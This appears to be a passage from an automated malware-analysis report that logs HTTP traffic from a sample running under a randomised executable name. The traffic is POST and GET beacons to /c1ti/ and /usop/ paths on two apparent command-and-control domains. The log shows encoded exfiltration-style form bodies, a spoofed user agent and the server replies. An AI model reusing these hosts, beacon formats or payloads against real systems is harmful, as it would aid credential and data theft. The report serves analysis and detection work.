                                                                                                                            Nov 7, 2024 10:52:01.581459045 CET820OUTPOST /c1ti/ HTTP/1.1
                                                                                                                            Host: www.primeproperty.property
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.primeproperty.property
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.primeproperty.property/c1ti/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 68 72 48 51 31 5a 70 47 37 63 77 54 64 31 66 66 33 66 35 44 54 62 73 46 33 65 55 71 4e 67 4e 4c 30 78 35 63 59 7a 4f 64 76 35 52 4e 73 6b 30 45 2b 58 52 30 6b 2f 48 7a 41 72 71 4c 6c 58 79 34 65 72 55 64 47 73 67 59 33 7a 6f 77 69 72 33 48 62 6b 71 50 78 70 45 5a 76 4e 36 67 71 52 37 64 70 69 32 51 72 47 44 6e 36 7a 57 55 6b 2f 42 66 49 41 6a 73 49 73 46 70 39 65 7a 46 72 33 31 49 6c 37 4e 67 76 73 73 7a 56 57 41 39 58 66 44 45 54 34 53 35 73 62 72 57 45 65 44 6c 5a 55 57 69 67 57 67 69 47 4f 6f 47 74 31 76 33 49 4a 76 46 43 36 35 52 31 51 3d 3d
                                                                                                                            Data Ascii: mFptYb=ZU9pjJTMzahphrHQ1ZpG7cwTd1ff3f5DTbsF3eUqNgNL0x5cYzOdv5RNsk0E+XR0k/HzArqLlXy4erUdGsgY3zowir3HbkqPxpEZvN6gqR7dpi2QrGDn6zWUk/BfIAjsIsFp9ezFr31Il7NgvsszVWA9XfDET4S5sbrWEeDlZUWigWgiGOoGt1v3IJvFC65R1Q==
                                                                                                                            Nov 7, 2024 10:52:02.651232004 CET717INHTTP/1.1 404 Not Found
                                                                                                                            Server: openresty/1.25.3.2
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:02 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 561
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                            Nov 7, 2024 10:52:02.859292984 CET717INHTTP/1.1 404 Not Found
                                                                                                                            Server: openresty/1.25.3.2
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:02 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 561
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            32192.168.2.2249193113.20.119.3180652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:04.123946905 CET2472OUTPOST /c1ti/ HTTP/1.1
                                                                                                                            Host: www.primeproperty.property
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.primeproperty.property
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.primeproperty.property/c1ti/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 75 72 33 51 79 34 70 47 2b 38 77 51 53 56 66 66 35 50 35 48 54 61 51 46 33 66 67 36 4e 53 42 4c 30 69 52 63 5a 57 36 64 6a 5a 52 4e 71 6b 30 41 77 33 52 59 6b 37 75 49 41 72 36 39 6c 56 65 34 59 4a 73 64 54 36 4d 66 2f 6a 6f 2b 30 62 33 45 62 6b 71 57 78 70 55 56 76 4e 2b 4f 71 52 6a 64 75 51 75 51 73 32 44 6b 32 54 57 55 6b 2f 42 44 49 41 6a 51 49 73 64 50 39 62 66 76 6f 42 52 49 67 72 74 67 38 62 41 30 63 32 41 78 55 66 44 61 61 4b 6e 52 6c 6f 4c 63 4f 49 37 44 45 48 36 57 71 6e 49 2f 47 39 78 4f 68 30 6a 4b 46 4f 72 4f 57 65 77 74 6e 69 6e 45 4d 62 74 51 72 4b 6d 6b 32 45 54 68 59 54 67 53 34 31 41 76 65 6e 4a 41 36 4b 54 72 57 37 66 62 31 62 55 6d 65 57 58 6f 56 56 35 4c 76 61 54 42 46 2b 4c 4d 72 36 6d 33 69 72 64 5a 31 75 2f 6b 4e 59 6e 6d 62 64 71 49 77 67 76 69 6f 57 39 78 4b 52 6e 4b 33 47 50 52 44 4c 57 76 53 37 63 41 58 55 30 77 55 59 45 6e 6a 63 6d 63 62 33 6e 36 48 37 36 6a 46 48 56 6a 64 78 6c 33 54 63 52 53 4b 4f 76 43 73 50 64 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=ZU9pjJTMzahpur3Qy4pG+8wQSVff5P5HTaQF3fg6NSBL0iRcZW6djZRNqk0Aw3RYk7uIAr69lVe4YJsdT6Mf/jo+0b3EbkqWxpUVvN+OqRjduQuQs2Dk2TWUk/BDIAjQIsdP9bfvoBRIgrtg8bA0c2AxUfDaaKnRloLcOI7DEH6WqnI/G9xOh0jKFOrOWewtninEMbtQrKmk2EThYTgS41AvenJA6KTrW7fb1bUmeWXoVV5LvaTBF+LMr6m3irdZ1u/kNYnmbdqIwgvioW9xKRnK3GPRDLWvS7cAXU0wUYEnjcmcb3n6H76jFHVjdxl3TcRSKOvCsPdp2TgN2BGvBJLKSBsjoeKescSe7GI9bZUO81PiQ0q46bJhz2py7Q9eS1nsprY+juzrFzFtVIb7tlEpcf8T1CYrg6EuMesLoi5FDlmAGZQ7hkILh0BAOW16CoA8bNb0UPE6qauI7vtfnQJjPtTDHWzfv50HBxRdXFoWv4brJA0qzJ3q2TLCiWj2Gb5Xye0+su+IvZ3kxOw4kydGnBnNWuDvQ2MiCq0M+J2yM6ywiGqoLLBEkz2y97J3SmMlOAQRKONAZuW28fWrlE4FxW0amZogy8Cr3C0WONMeviUlCvhm87Ni4T2vSL8i9wyajSL5ou8G0K0ttAKYCgWtYdnP8Haz24HDZQUaXFFCVGq/7aXoayzNUcWsqEyYUuguG7n8cFaId2XOPVo0NMkAh7N3YYe5u80h8/9z8XaQtXoQSJyJqiKew6LhOrJmL7I9e4NkmSQRnV5t8jg+1V0pgna7ONO77shviEZo+CDMbFyziCiPWDz1r/JiRZ1UxwEY0GIeb3ODBV9kDpcDxwxtv7l6BVkVDhGpif/v8sZiljQYWd4pWzJRrxTmoG0KHxk7l3VgOVFSZkd3Tf0pheFOcnzjMMbsXIuFCwN15Sg8wzYnbLH+PRLewGT6p+ZkIqGdt+b8ieRN2Jgu61rm3ta9Zx2eyxOKj9wF/uo41kPfD [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:04.128865957 CET1773OUTData Raw: 37 34 62 68 47 6f 59 39 77 49 64 53 50 64 73 2f 38 50 38 72 46 64 54 5a 6c 7a 4a 49 7a 56 78 39 71 61 39 37 6b 4f 71 79 78 33 42 46 67 76 4b 5a 7a 6f 41 73 53 32 78 39 4f 66 35 6f 48 46 36 31 70 4a 6b 38 6d 5a 37 39 75 44 76 32 5a 4d 71 6f 46 2f
                                                                                                                            Data Ascii: 74bhGoY9wIdSPds/8P8rFdTZlzJIzVx9qa97kOqyx3BFgvKZzoAsS2x9Of5oHF61pJk8mZ79uDv2ZMqoF/BFssEvVt4X7Oy0/806AZFORluDsC+hWCTIxuuiPsyFgJKuupPrXDE3VXjlf5nKLHQimO3yW6z1jXxIBpLspwaBrIYr9u/Qjqg3r4GP09l64SLBICCqTbnm2UUoGj/fgboXmmqXMTjfToUEgYaZSYW+IDOzMkw9any
                                                                                                                            Nov 7, 2024 10:52:05.191865921 CET717INHTTP/1.1 404 Not Found
                                                                                                                            Server: openresty/1.25.3.2
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:05 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 561
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                            Nov 7, 2024 10:52:05.403481960 CET717INHTTP/1.1 404 Not Found
                                                                                                                            Server: openresty/1.25.3.2
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:05 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 561
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            33192.168.2.2249194113.20.119.3180652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:06.662502050 CET540OUTGET /c1ti/?Vta=nFypuDtholF&mFptYb=UWVJg+rBkYQ16c/k/Y1W1sgQfFqH6LNVaa0x99kOYGF7jBYWQyWqo55Eiz0L22BflNyMA4mVt2TvQrx7EMMmoG9cjujHDm+244I0l/r76jr6gTXXvUDzyyGCpqIK HTTP/1.1
                                                                                                                            Host: www.primeproperty.property
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:52:07.720448971 CET717INHTTP/1.1 404 Not Found
                                                                                                                            Server: openresty/1.25.3.2
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:07 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 561
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                            Nov 7, 2024 10:52:07.931379080 CET717INHTTP/1.1 404 Not Found
                                                                                                                            Server: openresty/1.25.3.2
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:07 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 561
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            34192.168.2.224919547.129.103.18580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:13.204430103 CET2472OUTPOST /usop/ HTTP/1.1
                                                                                                                            Host: www.kghjkx.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.kghjkx.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.kghjkx.xyz/usop/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 68 67 54 35 58 57 6d 59 62 31 55 71 73 71 42 61 58 4c 66 51 34 38 52 36 32 76 63 61 5a 58 30 53 76 67 63 62 36 4c 61 63 77 46 4a 68 7a 39 62 47 65 57 67 39 73 53 34 74 6e 64 72 6b 30 63 50 65 61 44 63 54 78 73 2b 54 46 45 64 4f 4d 4f 49 57 79 6c 52 74 55 39 4c 2b 2b 56 32 4c 55 38 2b 75 36 5a 75 65 49 4e 63 77 66 4d 44 63 64 75 52 36 47 78 7a 72 4a 57 70 4d 42 46 64 37 30 71 30 45 6a 62 64 77 57 38 43 76 65 52 66 42 74 69 61 54 47 70 42 4b 6e 78 4d 62 6d 49 2b 2b 74 30 72 44 59 42 4b 41 38 71 35 74 31 69 48 51 43 62 37 37 41 45 6f 6a 59 56 65 63 38 46 6a 58 48 66 35 4f 43 57 33 2b 57 4c 6d 6c 62 64 67 64 79 30 64 4b 58 4d 53 6d 31 45 53 32 54 39 42 36 37 4c 38 63 46 75 5a 5a 4a 53 71 6d 73 33 4e 67 6d 42 4b 63 4b 78 4f 49 64 6a 50 39 48 2f 35 50 36 71 5a 6f 57 57 41 7a 37 78 65 38 4b 65 30 56 69 58 48 5a 49 63 70 79 4d 41 4b 69 31 69 68 42 39 66 7a 7a 65 4f 59 6a 58 33 77 74 53 46 76 4b 32 4c 31 35 74 53 4a 6d 45 33 32 69 63 56 56 78 74 68 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=6Ez30ZWXMUnDmhgT5XWmYb1UqsqBaXLfQ48R62vcaZX0Svgcb6LacwFJhz9bGeWg9sS4tndrk0cPeaDcTxs+TFEdOMOIWylRtU9L++V2LU8+u6ZueINcwfMDcduR6GxzrJWpMBFd70q0EjbdwW8CveRfBtiaTGpBKnxMbmI++t0rDYBKA8q5t1iHQCb77AEojYVec8FjXHf5OCW3+WLmlbdgdy0dKXMSm1ES2T9B67L8cFuZZJSqms3NgmBKcKxOIdjP9H/5P6qZoWWAz7xe8Ke0ViXHZIcpyMAKi1ihB9fzzeOYjX3wtSFvK2L15tSJmE32icVVxth8PxV54xKkXb0tl6lS5942kZYshVAEB22A6evMn6P/ZZnnK99Gv4XOJ6M0oedPWqI9r997EyjQnp4UPjttwCg0OlXkbJNwP/YHozHrr+9y/8GuGXcl6nmJxPjTSPRN2P+Fi4xtlsaHlTnWctUEwfmiQdRob6i8MD5+XIkJarfNZFDcujwdosStIEaSlA5imyur0cVmqDwrH4zit6pLj3t6mVXRTVVPaXKYOSrddv98PUfioC9sf2YLh2Ol5gR3gqCIpIa3KlT9Plw/h9IZTQc2km5iRQe1TOKWpwlnN5qPKNOaGIu8Nf8QkTU9bajwUEIR6xnW2c9cXQONYTv7OiHHZJhycB8XkMWUIsXGtfjw4iQeD/f0Rvwz4pUpbs4BmhiCVOlLTEyOUEEgEEgKYfu20bgiUwrP2AkrDUNoEqBCYnCdLPZo3i8Rb5f07NosZsJFGgzkAnlFTW0SLZuNMW2LFynsMz8NZgb/twLKMPMMD+hebKncDRmJx1jtFrjiWJ9ofsFzfcYZ0PD9B4GbWwZXza/Kb31Ehi1JLHR88+1pywzXbaZAg+ADInTCQztYj2nvjdfMuA6wNfkgta7D5q3PCgQY96+trPb0EXv4IhgQLB05AP8fv9qNPDaJ7WoKeJnvgBh4vGSHH/TlVX2XIVo2Gl7oczPUuJD2J [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:13.209633112 CET273OUTData Raw: 46 52 69 54 36 72 55 6b 33 4a 74 75 7a 70 6e 44 7a 32 4a 50 52 61 57 64 55 4c 52 67 49 30 58 65 4c 51 33 66 5a 62 30 4d 54 59 61 63 6a 66 6c 61 2b 7a 76 59 71 42 32 44 2f 38 42 54 4a 41 64 62 77 4c 37 79 55 4b 69 78 4a 46 63 31 6b 53 42 33 79 4b
                                                                                                                            Data Ascii: FRiT6rUk3JtuzpnDz2JPRaWdULRgI0XeLQ3fZb0MTYacjfla+zvYqB2D/8BTJAdbwL7yUKixJFc1kSB3yKl5A9FQHmJaGHe5U/hQXTh1O0NbkN8NQsU0Xu0JcmCnNrpwKgPjXOsbqqga5eFOVnYCyGUfZie7vSLkmw8YSbkqqikDVnD1K3QG6LvGZ+vlgjttHMimWvsPGw+tTRv7oTQeJdDDggncnbQ5MfGr6pn9IYCs2R8UHsM
                                                                                                                            Nov 7, 2024 10:52:14.197551012 CET398INHTTP/1.1 301 Moved Permanently
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:14 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 162
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.kghjkx.xyz/usop/
                                                                                                                            Strict-Transport-Security: max-age=31536000
